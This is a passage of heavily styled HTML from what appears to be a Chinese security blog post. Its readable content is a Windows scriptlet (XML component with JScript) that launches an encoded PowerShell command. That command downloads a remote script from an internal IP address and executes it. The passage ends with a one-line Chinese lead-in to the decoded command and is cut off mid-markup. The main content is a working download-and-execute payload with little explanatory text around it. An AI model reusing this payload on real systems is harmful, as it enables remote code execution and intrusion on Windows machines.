line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">24</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 2020px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-ta" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(255, 0, 0) !important;"><?</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">xml</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">version</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"1.0"</span><span class="crayon-ta" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(255, 0, 0) !important;">?></span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-4" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"><</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">package</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-5" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-6" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"><</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">component</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">id</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"testCalc"</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-7" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-8" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-9" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-10" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-ta" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(255, 0, 0) !important;"><script</span>&nbsp;<span class="crayon-e " style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">language</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"JScript"</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-11" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-12" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"><</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">!</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">[</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">CDATA</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">[</span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-13" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-14" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">var</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">r</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">=</span>&nbsp;<span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">new</span>&nbsp;<span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">ActiveXObject</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"WScript.Shell"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">Run</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"powershell&nbsp;-enc&nbsp;SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwADEALgAxADAAMQAuADEANgAvAGMAaABtAC4AcABzADEAJwApAA=="</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-15" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-16" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">]</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">]</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-17" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-18" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-ta" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(255, 0, 0) !important;"></script></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-19" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-20" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-21" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-22" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"><</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">component</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div><div class="crayon-line" id="crayon-5c25a60d4f81a114883418-23" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f81a114883418-24" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"><</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">package</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">></span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">enc编码前的内容依然是：</p><div id="crayon-5c25a60d4f825241672940" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 622.4px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f825241672940-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;"><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: 